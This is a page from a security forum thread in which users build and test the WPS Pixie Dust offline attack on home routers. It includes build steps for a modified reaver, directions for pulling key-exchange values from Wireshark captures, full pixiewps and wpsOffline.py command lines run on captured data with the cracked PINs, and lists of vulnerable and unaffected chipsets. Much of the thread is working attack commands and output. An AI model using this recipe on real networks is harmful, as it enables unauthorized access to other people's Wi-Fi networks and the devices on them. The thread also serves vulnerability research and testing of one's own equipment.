Page 3 of 12 FirstFirst 123456789101112 LastLast
Results 101 to 150 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #101
    Join Date
    2014-Nov
    Posts
    7
    I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

  2. #102
    Join Date
    2014-Oct
    Posts
    44
    copy.
    How do you guys get the keys out of pcap file?
    just use wireshark?

  3. #103
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by SubZero5 View Post
    I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?
    No, they actually both work at the same time. It seems to just be a secret pin...

    Quote Originally Posted by wn722 View Post
    copy.
    How do you guys get the keys out of pcap file?
    just use wireshark?
    Well everything but the Authkey can be found in wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. The rest you need to find in a cap file/wireshark. -This was made following wiire's advice from a previous post!


    The PKE and PKR (Public Keys) are in the M1 and M2 messages. The M1 contains "Public Key" which is the PKE and the M2 also contains a "Public Key" but this key is different... aka the PKR. (Just right click and copy the values)

    If you can give me all this data, that would help A LOT in testing. Print it just like this:

    Code:
    N1 Enrollee Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E-Hash2:
    And optional (but very helpful) information:
    Code:
    Manufacturer: 
    Model Number:
    Hardware Version:
    All you have to do is:
    Code:
    cd /path/to/reaver-wps-fork/src
    ./configure
    make
    make install
    Then you should be good to find data
    Last edited by soxrok2212; 2015-03-31 at 00:48.

  4. #104
    Join Date
    2013-Jul
    Posts
    818
    Install matters for reaver download

    Go to the src folder

    To avoid a file permission error type

    chmod 755 configure

    then

    ./configure

    make

    make install


    If you get the following error

    checking for pcap_open_live in -

    lpcap... no
    error: pcap library not found!

    Then install these two(2) files:


    sudo apt-get install libpcap-dev

    sudo apt-get install libsqlite3-dev


    then

    ./configure

    make

    make install

    Program ran fine after this

    Great Stuff Soxrox2212!!!

  5. #105
    Join Date
    2014-Oct
    Posts
    42
    Havent had a chance to test the PIN, but here is what I got.

    Code:
    Arris - DG1670AB2
    
    N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
    Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
    PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a
    PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e
    E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
    E-Hash2:b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
    
    PIN Found- 04847533

  6. #106
    Join Date
    2013-Jul
    Posts
    818
    To Soxrox2212

    We see your written reaver program provides the Enrollee nonce

    The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 message with wireshark the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.

    The string length of the -ak -hash1 and -hash2 is 64

    A breakdown of M1 and M2 can be found at:

    https://briolidz.wordpress.com/2012/...ted-setup-wps/

    Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
    Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)

    • || this symbol means concatenation of parameters to form a message.
    • Mn* is message Mn excluding the HMAC-SHA-256 value.
    • Version identifies the type of Registration Protocol message.
    • N1 is a 128-bit random number (nonce) specified by the Enrollee.
    • N2 is a 128-bit random number (nonce) specified by the Registrar.
    • Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages

    Our understanding is we must strip off parts of the M1 and M2 message is this correct?

  7. #107
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by psicomantis View Post
    Havent had a chance to test the PIN, but here is what I got.

    Code:
    Arris - DG1670AB2
    
    PIN Found- 04847533
    This is what I got:

    root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

    [%] Progress: 0% 100%[*] Time taken: 0 s
    [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
    [*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b

    [+] WPS pin: 04840753

  8. #108
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by mmusket33 View Post
    To Soxrox2212

    Our understanding is we must strip off parts of the M1 and M2 message is this correct?
    All you should have to do is open wireshark, navigate to the M1 and M2 messages, then scroll to the public keys and copy the values for those keys... I'd upload a screenshot but the formatting requirements to upload are whack...
    Last edited by soxrok2212; 2015-03-31 at 03:13.

  9. #109
    Join Date
    2013-Jul
    Posts
    818
    MTeams are stumbling thru this attack testing on three(3) different computers.

    Here is an administrative problem to watch out for.

    1. When running the new reaver program provided by soxrox2212 you should see additional text data.

    Such as:

    Starting Cracking Session....

    > N1 Enrollee Nounce: ....

    >Auth Key....

    If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both

    Enable Networking
    Enable Wireless

    checked. If that does not work restart the computer.

    Some laptops will not provide this output unless these two(2) items are functioning.

  10. #110
    Join Date
    2014-Apr
    Posts
    8
    Same here Finishing Broadcom PRNG as well

    Maybe it is not worth it to implement in several threads, you can bruteforce PSK2 at the same time than PSK1. But being time zero ....
    With Broadcom, since we got N1 and the entropy is reduced to 32-7=25 bits. It is still constant time even without threads.

    $ time python wpsOffline.py -ak 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -pke d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -pkr bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -ehash1 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -ehash2 b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
    PIN FOUND! 04847533

    real 0m0.488s
    user 0m0.473s
    sys 0m0.012s
    Last edited by dudux; 2015-03-31 at 11:29.

  11. #111
    Join Date
    2014-Oct
    Posts
    44
    hey, I'm testing it with TP-Link device on WN722N usb dongle (Atheros)
    Code:
    Atheros Communications, Inc. AR9271 802.11n
    and nothing comes up with wpsOffline script.
    can anyone ping me pixiewps.c version?
    link on dropbox is dead

    p.s.
    on some routers PKE comes up as
    Code:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    cheers.

    my data is
    Code:
    > AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4:20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
    [+] Sending M2 message
     > E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4:ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
     > E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8:59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95
    
    M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d:79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:bd:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9:f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b:7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b:91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c:ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:eb:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0:ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9:ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:47:23:64:fc:88:aa:08:01:c9
    M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef:ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60:29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d:77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:da:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa:b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f:60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd:23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18:8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:fa:8d:9f:0a:db:57:bb:26:a5
    Last edited by wn722; 2015-03-31 at 15:51.

  12. #112
    Join Date
    2014-Oct
    Posts
    44
    big ups soxrox and musket for explanations.

  13. #113
    Join Date
    2014-Apr
    Posts
    8
    Quote Originally Posted by wn722 View Post
    big ups soxrox and musket for explanations.
    If wpsOffline does not print anything that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.

    the C code I hosted right here: https://bitbucket.org/dudux/wpsoffli...ode/?at=master
    But it will give you the same result. Basically the attack is pretty much the same

  14. #114
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    That version of pixiewps is depreciated. A new version should be released soon by the author wiire.

  15. #115
    Join Date
    2014-Oct
    Posts
    44
    ok,
    is it AP chipset specific? or firmware?

  16. #116
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by wn722 View Post
    ok,
    is it AP chipset specific? or firmware?
    Both. If the vendor didn't change the WPS implementation then it is chipset specific, but the AP manufacturer may have changed that. Usually they don't however.

  17. #117
    Join Date
    2014-Oct
    Posts
    42
    I havent been able to test the PIN of my initial capture, but tested thie one today and worked perfectly.

    Code:
    TG1672G32 
    
    N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
    AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78:bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
    PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b:1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a:84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4:1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba:79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4:cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:12:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37:d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae:90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:66:a3:5c:82:96:62:f7:7b:ed
    PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e:0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:27:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5:57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa:2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd:60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11:52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:40:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1:58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06:9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9b:fa:ba:51:88:e8:a7:08:34
    E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c:eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
    E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65:a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56
    
    [+] Pin cracked in 15 seconds
    [+] WPS PIN: '31335492'

  18. #118
    Join Date
    2014-Oct
    Posts
    44
    i see.
    one more quetion - these keys (ak, PKE,PKR, Ehash1/2) do they need to be part of same conversation?
    OR any key is good?

  19. #119
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    They have to be from the same session. Aka pin 77755533's data will differ from 98949682. The data is not interchangable.
    Last edited by soxrok2212; 2015-04-01 at 14:13.

  20. #120
    Join Date
    2014-Oct
    Posts
    44
    edited **************8
    Last edited by wn722; 2015-04-01 at 15:51.

  21. #121
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!

  22. #122
    Join Date
    2014-Oct
    Posts
    44
    nah, i was just being thick - all it takes is to run reaver with one pin attempt.
    I'm assuming you get all the data from one try though

  23. #123
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Yes you are correct

  24. #124
    Join Date
    2014-Oct
    Posts
    44
    anyone tried TP-Link devices?
    I got some 740,841 and it's zip.

  25. #125
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

  26. #126
    Join Date
    2013-Jul
    Posts
    818
    More reaver/bully reinstall problems with pixiedust mod

    Musket Team labs did a fresh HD install of kali-linux then apt-get upgrade/apt-get install then loaded the pixie dust moded bully and reaver. First note our comments in threads above for reaver install concerning libpcap-dev and libsqlite3-dev.

    In addition:

    When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

    You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.


    To correct this get an internet connection then:

    apt-get install libssl-dev


    Run wireshark and reaver and the public key for M2 will be seen.

    Install bully and the install process proceeds with no errors.

    Musket Teams Labs
    Last edited by mmusket33; 2015-04-02 at 02:51.

  27. #127
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by soxrok2212 View Post
    There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?
    no i meant i'm getting nothing when running it against the script.
    I didn't see any tp-link in the list of supported devices.
    c

  28. #128
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by mmusket33 View Post
    When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.
    You get PKR: 00:00 [...] 00:02 when using '-S' ('--dh-small') option.

    @wn722
    The very first AP I tested was a TP-LINK (see my first 2 posts). But I haven't written down the model.

  29. #129
    Join Date
    2013-Jul
    Posts
    818
    To Wire - Yes we ran a test and you are correct. This then leads to to the obvious question.

    1. Will a pixie dust attack work with DH small data?

    2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.


    MTeams

  30. #130
    Join Date
    2014-Oct
    Posts
    44
    @wiire
    hm, can you look it up?
    also did you use wpsOffline or pixiewps script?

  31. #131
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by mmusket33 View Post
    1. Will a pixie dust attack work with DH small data?

    2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.
    I was getting 00:00:xx:02 PK every now and then running with bare reaver. with -N -L -S option it was fixed.

  32. #132
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

  33. #133
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by soxrok2212 View Post
    I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.
    Of course it works.

    I added the -S option to pixiewps so we don't need to print PKR on screen or get it on Wireshark.

    @wn722
    I only use my program, pixiewps.

  34. #134
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by wiire View Post

    @wn722
    I only use my program, pixiewps.
    can you share a link?
    cheers.

  35. #135
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by wn722 View Post
    can you share a link?
    cheers.
    It will be out along with a video demo sometime this week.

  36. #136
    Join Date
    2015-Mar
    Posts
    54
    Pixiewps is out!

    Link to the pixiewps thread.

  37. #137
    Join Date
    2013-Mar
    Posts
    40
    Modified Reaver Not Showing Publick Key (pke)..

    Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received iden***y request
    [+] Sending iden***y response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received iden***y request
    [+] Sending iden***y response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  38. #138
    Join Date
    2014-Oct
    Posts
    44
    cool.
    does it matter if you use dec format or just plain string?

    af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
    vs
    af75f62ceb08c3f971722292046fcd0c

  39. #139
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    I'm pretty sure both work.

  40. #140
    Join Date
    2014-Oct
    Posts
    44
    If anyone has luck on devices can you post your HW info?
    didn't work for
    TP link 841N v8 - AR9341
    TP link 841N v9 - QCA9533-AL3A
    TP link 720N v1 - AR9331

  41. #141
    Join Date
    2014-Oct
    Posts
    44
    hey any way to get the AK from wireshark only?

  42. #142
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Those are all Atheros not supported that's why it didn't work

  43. #143
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
    really appreciate!!!!
    one-test...seem correct
    http://www.imagestime.com/show.php/1...pixie.PNG.html

  44. #144
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by zimmaro View Post
    many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
    really appreciate!!!!
    one-test...seem correct
    http://www.imagestime.com/show.php/1...pixie.PNG.html
    You could've just converted the last 6 bytes of the MAC to decimal to get the PIN. But whatever...

    10/10 for the drawing!

    @wn722
    No.

  45. #145
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by soxrok2212 View Post
    Those are all Atheros not supported that's why it didn't work
    that's a bummer...

  46. #146
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Many thanks soxrok2212 and all who participated! Epic thread
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  47. #147
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Quest View Post
    Many thanks soxrok2212 and all who participated! Epic thread
    Don't forget Wiire... the actual creator of the tool!

  48. #148
    Join Date
    2014-Oct
    Posts
    42
    Quick question. Would it matter if I always use the enrollee nonce? or should I only use it in certain cases?

  49. #149
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.

  50. #150
    Join Date
    2015-Mar
    Posts
    141
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    Ralink chipset: RT3050

    Confirmed Vulnerable.

    https://wikidevi.com/wiki/Encore_ENHWI-3GN3
    Last edited by aanarchyy; 2015-04-07 at 18:19.

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
